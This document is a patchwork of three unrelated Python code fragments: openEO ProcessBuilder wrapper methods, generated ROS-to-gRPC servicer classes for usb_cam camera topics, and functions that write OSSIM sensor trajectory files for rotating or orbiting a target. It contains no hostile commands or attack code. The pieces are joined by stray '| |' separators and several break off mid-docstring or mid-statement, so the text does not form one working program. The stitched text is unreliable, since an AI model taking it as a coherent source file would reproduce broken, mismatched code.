def floor(self) -> 'ProcessBuilder':
"""
Round fractions down
:param self: A number to round down.
:return: The number rounded down.
"""
return floor(x=self)
def gt(self, y) -> 'ProcessBuilder':
"""
Greater than comparison
:param self: First operand.
:param y: Second operand.
:return: `true` if `x` is strictly greater than `y` or `null` if any operand is `null`, otherwise
`false`.
"""
return gt(x=self, y=y)
def gte(self, y) -> 'ProcessBuilder':
"""
Greater than or equal to comparison
:param self: First operand.
:param y: Second operand.
:return: `true` if `x` is greater than or equal to `y`, `null` if any operand is `null`, otherwise
`false`.
"""
return gte(x=self, y=y)
def if_(self, accept, reject=UNSET) -> 'ProcessBuilder':
"""
If-Then-Else conditional
:param self: A boolean value.
:param accept: A value that is returned if the boolean value is `true`.
:param reject: A value that is returned if the boolean value is **not** `true`. Defaults to `null`.
:return: Either the `accept` or `reject` argument depending on the given boolean value.
"""
return if_(value=self, accept=accept, reject=reject)
def int(self) -> 'ProcessBuilder':
"""
Integer part of a number
:param self: A number.
:return: Integer part of the number.
"""
return int(x=self)
def is_infinite(self) -> 'ProcessBuilder':
"""
Value is an infinite number
:param self: The data to check.
:return: `true` if the data is an infinite number, otherwise `false`.
"""
return is_infinite(x=self)
def is_nan(self) -> 'ProcessBuilder':
"""
Value is not a number
:param self: The data to check.
:return: `true` if the data is not a number, otherwise `false`.
"""
return is_nan(x=self)
def is_nodata(self) -> 'ProcessBuilder':
"""
Value is a no-data value
:param self: The data to check.
:return: `true` if the data is a no-data value, otherwise `false`.
"""
return is_nodata(x=self)
def is_valid(self) -> 'ProcessBuilder':
"""
Value is valid data
:param self: The data to check.
:return: `true` if the data is valid, otherwise `false`.
"""
return is_valid(x=self)
def last(self, ignore_nodata=UNSET) -> 'ProcessBuilder':
"""
Last element
:param self: An array with elements of any data type.
:param ignore_nodata: Indicates whether no-data values are ignored or not. Ignores them by default.
Setting this flag to `false` considers no-data values so that `null` is returned if the last value is
such a value.
:return: The last element of the input array.
"""
return last(data=self, ignore_nodata=ignore_nodata)
def linear_scale_range(self, inputMin, inputMax, outputMin=UNSET, outputMax=UNSET) -> 'ProcessBuilder':
"""
Linear transformation between two ranges
:param self: A number to transform. The number gets clipped to the bounds specified in `inputMin` and
`inputMax`.
:param inputMin: Minimum value the input can obtain.
:param inputMax: Maximum value the input can obtain.
:param outputMin: Minimum value of the desired output range.
:param outputMax: Maximum value of the desired output range.
:return: The transformed number.
"""
return linear_scale_range(x=self, inputMin=inputMin, inputMax=inputMax, outputMin=outputMin, outputMax=outputMax)
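# Worked example (illustrative, using the usual openEO definition of the process):
# linear_scale_range computes ((x - inputMin) / (inputMax - inputMin)) *
# (outputMax - outputMin) + outputMin after clipping x to [inputMin, inputMax].
# For x = 5, inputMin = 0, inputMax = 10, outputMin = 0, outputMax = 255 the
# result is (5 / 10) * 255 = 127.5.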
def ln(self) -> 'ProcessBuilder':
"""
Natural logarithm
:param self: A number to compute the natural logarithm for.
:return: The computed natural logarithm.
"""
return ln(x=self)
def load_collection(self, spatial_extent, temporal_extent, bands=UNSET, properties=UNSET) -> 'ProcessBuilder':
"""
Load a collection
:param self: The collection id.
:param spatial_extent: Limits the data to load from the collection to the specified bounding box or
polygons. The process puts a pixel into the data cube if the point at the pixel center intersects with
the bounding box or any of the polygons (as defined in the Simple Features standard by the OGC). The
GeoJSON can be one of | |
ros_msg.topics:
pb_msg.topics.append(ros_msg_)
yield pb_msg
rospy.sleep(0.01)
class usb_cam_camera_infoServicer(ros_grpc.usb_cam_camera_infoServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/CameraInfo')
def Publish(self, pb_msg, context):
if self.pub is None:
self.pub = rospy.Publisher('/usb_cam/camera_info', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.height = pb_msg.height
ros_msg.width = pb_msg.width
ros_msg.distortion_model = pb_msg.distortion_model
for pb_msg_ in pb_msg.D:
ros_msg.D.append(pb_msg_)
for pb_msg_ in pb_msg.K:
ros_msg.K.append(pb_msg_)
for pb_msg_ in pb_msg.R:
ros_msg.R.append(pb_msg_)
for pb_msg_ in pb_msg.P:
ros_msg.P.append(pb_msg_)
ros_msg.binning_x = pb_msg.binning_x
ros_msg.binning_y = pb_msg.binning_y
ros_msg.roi.x_offset = pb_msg.roi.x_offset
ros_msg.roi.y_offset = pb_msg.roi.y_offset
ros_msg.roi.height = pb_msg.roi.height
ros_msg.roi.width = pb_msg.roi.width
ros_msg.roi.do_rectify = pb_msg.roi.do_rectify
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/camera_info', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.CameraInfo()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.height = ros_msg.height
pb_msg.width = ros_msg.width
pb_msg.distortion_model = ros_msg.distortion_model
for ros_msg_ in ros_msg.D:
pb_msg.D.append(ros_msg_)
for ros_msg_ in ros_msg.K:
pb_msg.K.append(ros_msg_)
for ros_msg_ in ros_msg.R:
pb_msg.R.append(ros_msg_)
for ros_msg_ in ros_msg.P:
pb_msg.P.append(ros_msg_)
pb_msg.binning_x = ros_msg.binning_x
pb_msg.binning_y = ros_msg.binning_y
pb_msg.roi.x_offset = ros_msg.roi.x_offset
pb_msg.roi.y_offset = ros_msg.roi.y_offset
pb_msg.roi.height = ros_msg.roi.height
pb_msg.roi.width = ros_msg.roi.width
pb_msg.roi.do_rectify = ros_msg.roi.do_rectify
yield pb_msg
rospy.sleep(0.01)
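# Hedged wiring sketch (not part of the source): servicers such as the one above are
# normally attached to a grpc.server via the add_*Servicer_to_server helpers that
# grpc code generation emits next to the *Servicer base classes.  The helper name
# below follows that convention and is an assumption, not a call verified against
# the generated module.
#
#   import grpc
#   from concurrent import futures
#
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   ros_grpc.add_usb_cam_camera_infoServicer_to_server(usb_cam_camera_infoServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()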
class usb_cam_image_rawServicer(ros_grpc.usb_cam_image_rawServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/Image')
def Publish(self, pb_msg, context):
if self.pub is None:
self.pub = rospy.Publisher('/usb_cam/image_raw', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.height = pb_msg.height
ros_msg.width = pb_msg.width
ros_msg.encoding = pb_msg.encoding
ros_msg.is_bigendian = pb_msg.is_bigendian
ros_msg.step = pb_msg.step
ros_msg.data = pb_msg.data
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.Image()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.height = ros_msg.height
pb_msg.width = ros_msg.width
pb_msg.encoding = ros_msg.encoding
pb_msg.is_bigendian = ros_msg.is_bigendian
pb_msg.step = ros_msg.step
pb_msg.data = ros_msg.data
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressedServicer(ros_grpc.usb_cam_image_raw_compressedServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/CompressedImage')
def Publish(self, pb_msg, context):
if self.pub is None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.format = pb_msg.format
ros_msg.data = pb_msg.data
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.CompressedImage()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.format = ros_msg.format
pb_msg.data = ros_msg.data
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressed_parameter_descriptionsServicer(ros_grpc.usb_cam_image_raw_compressed_parameter_descriptionsServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('dynamic_reconfigure/ConfigDescription')
def Publish(self, pb_msg, context):
if self.pub is None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed/parameter_descriptions', self.Msg, queue_size=10)
ros_msg = self.Msg()
for pb_msg_ in pb_msg.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/Group')()
ros_msg_.name = pb_msg_.name
ros_msg_.type = pb_msg_.type
for pb_msg__ in pb_msg_.parameters:
ros_msg__ = roslib.message.get_message_class('dynamic_reconfigure/ParamDescription')()
ros_msg__.name = pb_msg__.name
ros_msg__.type = pb_msg__.type
ros_msg__.level = pb_msg__.level
ros_msg__.description = pb_msg__.description
ros_msg__.edit_method = pb_msg__.edit_method
ros_msg_.parameters.append(ros_msg__)
ros_msg_.parent = pb_msg_.parent
ros_msg_.id = pb_msg_.id
ros_msg.groups.append(ros_msg_)
for pb_msg_ in pb_msg.max.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.bools.append(ros_msg_)
for pb_msg_ in pb_msg.max.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.ints.append(ros_msg_)
for pb_msg_ in pb_msg.max.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.strs.append(ros_msg_)
for pb_msg_ in pb_msg.max.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.max.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.max.groups.append(ros_msg_)
for pb_msg_ in pb_msg.min.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.bools.append(ros_msg_)
for pb_msg_ in pb_msg.min.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.ints.append(ros_msg_)
for pb_msg_ in pb_msg.min.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.strs.append(ros_msg_)
for pb_msg_ in pb_msg.min.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.min.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.min.groups.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.bools.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.ints.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.strs.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.dflt.groups.append(ros_msg_)
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed/parameter_descriptions', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.dynamic_reconfigure.ConfigDescription()
for ros_msg_ in ros_msg.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.Group()
pb_msg_.name = ros_msg_.name
pb_msg_.type = ros_msg_.type
for ros_msg__ in ros_msg_.parameters:
pb_msg__ = ros_pb.dynamic_reconfigure.ParamDescription()
pb_msg__.name = ros_msg__.name
pb_msg__.type = ros_msg__.type
pb_msg__.level = ros_msg__.level
pb_msg__.description = ros_msg__.description
pb_msg__.edit_method = ros_msg__.edit_method
pb_msg_.parameters.append(pb_msg__)
pb_msg_.parent = ros_msg_.parent
pb_msg_.id = ros_msg_.id
pb_msg.groups.append(pb_msg_)
for ros_msg_ in ros_msg.max.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.bools.append(pb_msg_)
for ros_msg_ in ros_msg.max.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.ints.append(pb_msg_)
for ros_msg_ in ros_msg.max.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.strs.append(pb_msg_)
for ros_msg_ in ros_msg.max.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.max.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.max.groups.append(pb_msg_)
for ros_msg_ in ros_msg.min.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.bools.append(pb_msg_)
for ros_msg_ in ros_msg.min.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.ints.append(pb_msg_)
for ros_msg_ in ros_msg.min.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.strs.append(pb_msg_)
for ros_msg_ in ros_msg.min.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.min.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.min.groups.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.bools.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.ints.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.strs.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.dflt.groups.append(pb_msg_)
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressed_parameter_updatesServicer(ros_grpc.usb_cam_image_raw_compressed_parameter_updatesServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('dynamic_reconfigure/Config')
def Publish(self, pb_msg, context):
if self.pub is None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed/parameter_updates', self.Msg, queue_size=10)
ros_msg = self.Msg()
for pb_msg_ in pb_msg.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.bools.append(ros_msg_)
for pb_msg_ in pb_msg.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.ints.append(ros_msg_)
for pb_msg_ in pb_msg.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.strs.append(ros_msg_)
for pb_msg_ in pb_msg.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.groups.append(ros_msg_)
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed/parameter_updates', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.dynamic_reconfigure.Config()
for ros_msg_ in ros_msg.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.bools.append(pb_msg_)
for ros_msg_ in ros_msg.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.ints.append(pb_msg_)
for ros_msg_ in ros_msg.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.strs.append(pb_msg_)
for ros_msg_ in ros_msg.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id | |
elevation file
Raises:
| No exception is raised.
"""
#obtain odd number of samples around equator 2*pi
if numSamplesAz % 2 == 0:
numSamplesAz += 1
azimuth = np.linspace(0,2 * np.pi, numSamplesAz)
#create twice too many elevation samples, then take every second
elevation2 = np.linspace(np.pi/2., -np.pi/2., numSamplesAz)
elevation = elevation2[::2]
if trajType == 'Rotate':
(x, y, z, roll, pitch, yaw, azel) = \
getRotateFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos)
elif trajType == 'Orbit':
(x, y, z, roll, pitch, yaw, azel) = \
getOrbitFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos, distance)
else:
print('Unknown trajectory type')
return
zerov = np.zeros(yaw.shape).reshape(-1, 1)
onesv = np.ones(yaw.shape).reshape(-1, 1)
time = np.array([deltaTime * i for i in range(0,zerov.shape[0])]).reshape(-1, 1)
#time = np.around(time,2) # rounding does not help. internal representation!!
outp = time
outp = np.hstack((outp, x))
outp = np.hstack((outp, y))
outp = np.hstack((outp, z))
outp = np.hstack((outp, roll))
outp = np.hstack((outp, yaw))
outp = np.hstack((outp, pitch))
outp = np.hstack((outp, xVel * onesv)) # x-velocity
outp = np.hstack((outp, yVel * onesv)) # y-velocity
outp = np.hstack((outp, zVel * onesv)) # z-velocity
outp = np.hstack((outp, engine * onesv)) # engine setting
outfile = os.path.basename(filename)
idx=outfile.find('.')
if not idx < 0:
outfile = outfile[:idx]
# fid = open('Trajectory{0}{1}.txt'.format(trajType,outfile), 'w' )
fid = open('Alt{0}Range{1}{2}-{3}-traj.lut'.format(-zTargPos,distance,trajType,outfile), 'w' )
fid.write( 'Time x y z rol yaw pit vx vy vz engine \n' )
fid.write( '0.0 infty infty infty infty infty infty infty infty infty infty \n' )
fid.write( '0.0 infty infty infty infty infty infty infty infty infty infty\n' )
np.savetxt(fid , outp)
fid.close()
fid = open('Alt{0}Range{1}{2}-{3}-Azel.dat'.format(-zTargPos,distance,trajType,outfile), 'w' )
fid.write( 'Azimuth Elevation \n' )
np.savetxt( fid, azel )
print('Set OSSIM clock to {0} increments and max time {1}\n'.\
format(deltaTime, deltaTime * yaw.shape[0]))
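# For reference (derived from the writes above; sample values are illustrative):
# the generated *-traj.lut file begins with a header line and two 'infty' rows,
# followed by one "time x y z roll yaw pitch vx vy vz engine" record per sample:
#
#   Time x y z rol yaw pit vx vy vz engine
#   0.0 infty infty infty infty infty infty infty infty infty infty
#   0.0 infty infty infty infty infty infty infty infty infty infty
#   0.0 1000.0 0.0 -500.0 0.0 -3.1416 0.0 0.0 0.0 0.0 1.0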
##############################################################################
##
def getRotateFromElevAzim(azimuth, elevation, xPos, yPos, zPos):
""" Reads an OFF file and returns object attitude and position.
Calculate the pitch and yaw angles to point the object's X-axis towards
the OFF file vertex directions.
Euler order is yaw-pitch-roll, with roll equal to zero.
Yaw is defined in xy plane.
Pitch is defined in xz plane.
Roll is defined in yz plane.
The object is assumed to stationary at the position (xPos, yPos, zPos),
the position arrays are the same length as the attitude angle arrays,
but all values in each individual array are all the same.
Args:
| azimuth (np.array(N,)): azimuth values
| elevation (np.array(N,)): elevation values
| xPos (double): object position on x axis
| yPos (double): object position on y axis
| zPos (double): object position on z axis
Returns:
| x(np.array()): array of x object location values
| y(np.array()): array of y object location values
| z(np.array()): array of z object location values
| roll(np.array()): array of object location roll values
| pitch(np.array()): array of object location pitch values
| yaw(np.array()): array of object location yaw values
| azel(np.array()): array of azimuth,elevation values for each sample
Raises:
| No exception is raised.
"""
azimgrid, elevgrid = np.meshgrid(azimuth,elevation)
yaw = azimgrid.reshape(-1,1)
pitch = elevgrid.reshape(-1,1)
roll = np.zeros(yaw.shape).reshape(-1, 1)
onesv = np.ones(yaw.shape).reshape(-1, 1)
x = xPos * onesv
y = yPos * onesv
z = zPos * onesv
azel = azimgrid.reshape(-1, 1)
azel = np.hstack((azel, elevgrid.reshape(-1, 1)))
return (x, y, z, roll, pitch, yaw, azel)
##############################################################################
##
def getOrbitFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos, distance):
""" Reads an OFF file and returns sensor attitude and position.
Calculate the sensor attitude and position such that the sensor always
look at the object located at ( xTargPos, yTargPos, zTargPos), at
a constant distance.
Euler order is yaw-pitch-roll, with roll equal to zero.
Yaw is defined in xy plane.
Pitch is defined in xz plane.
Roll is defined in yz plane.
The object is assumed to stationary at the position
(xTargPos, yTargPos, zTargPos).
Args:
| azimuth (np.array(N,)): azimuth values
| elevation (np.array(N,)): elevation values
| xTargPos (double): x target object position (fixed)
| yTargPos (double): y target object position (fixed)
| zTargPos (double): z target object position (fixed)
| distance (double): range at which sensor orbits the target
Returns:
| x(np.array()): array of x sensor position values
| y(np.array()): array of y sensor position values
| z(np.array()): array of z sensor position values
| roll(np.array()): array of sensor roll values
| pitch(np.array()): array of sensor pitch values
| yaw(np.array()): array of sensor yaw values
| azel(np.array()): array of azimuth,elevation values for each sample
Raises:
| No exception is raised.
"""
targPosition = np.asarray([xTargPos, yTargPos, zTargPos])
print('target position {}'.format(targPosition))
#get the sensor position from the azimuth and elevation angles
#there must be a better way....
firstTime = True
for elev in elevation:
for azim in azimuth:
x = np.cos(azim) * np.cos(elev)
y = np.sin(azim) * np.cos(elev)
z = - np.sin(elev) # NED coordinate system
vertex = np.asarray([x, y, z])
azelelement = np.asarray([azim, elev])
# print(np.linalg.norm(vertex))
if firstTime:
azel = azelelement
vertices = vertex
firstTime = False
else:
vertices = np.vstack((vertices, vertex))
azel = np.vstack((azel, azelelement))
sensorPos = distance * vertices
sensorPos[:,0] = sensorPos[:,0] + xTargPos
sensorPos[:,1] = sensorPos[:,1] + yTargPos
sensorPos[:,2] = sensorPos[:,2] + zTargPos
ysign = (1 * (sensorPos[:,1] < 0) - 1 * (sensorPos[:,1] >= 0)).reshape(-1, 1)
xyradial = (np.sqrt((targPosition[0]-sensorPos[:,0]) ** 2 + \
(targPosition[1]-sensorPos[:,1]) ** 2)).reshape(-1, 1)
deltaX = (targPosition[0]-sensorPos[:,0]).reshape(-1, 1)
#the strange '+ (xyradial==0)' below is to prevent divide by zero
cosyaw = ((deltaX/(xyradial + (xyradial==0))) * (xyradial!=0) + 0 * (xyradial==0))
yaw = ysign * np.arccos(cosyaw)
pitch = - np.arctan2((targPosition[2]-sensorPos[:,2]).reshape(-1, 1),
xyradial).reshape(-1, 1)
roll = np.zeros(yaw.shape).reshape(-1, 1)
return (sensorPos[:,0].reshape(-1, 1), sensorPos[:,1].reshape(-1, 1), \
sensorPos[:,2].reshape(-1, 1), roll, pitch, yaw, azel)
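# Quick sanity check of the geometry above (illustrative, not in the source):
# with the target at the origin and a single sample at azim=0, elev=0, distance=1000,
# the sensor lands at (1000, 0, 0).  Then
#   deltaX = 0 - 1000 = -1000, xyradial = 1000, cosyaw = -1
#   ysign = -1 (sensor y == 0), so yaw = -pi, i.e. the sensor faces back along -x
#   pitch = -arctan2(0 - 0, 1000) = 0
# so the sensor's x-axis points straight at the target, as intended.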
# #mayavi commented out
# ################################################################
# ##
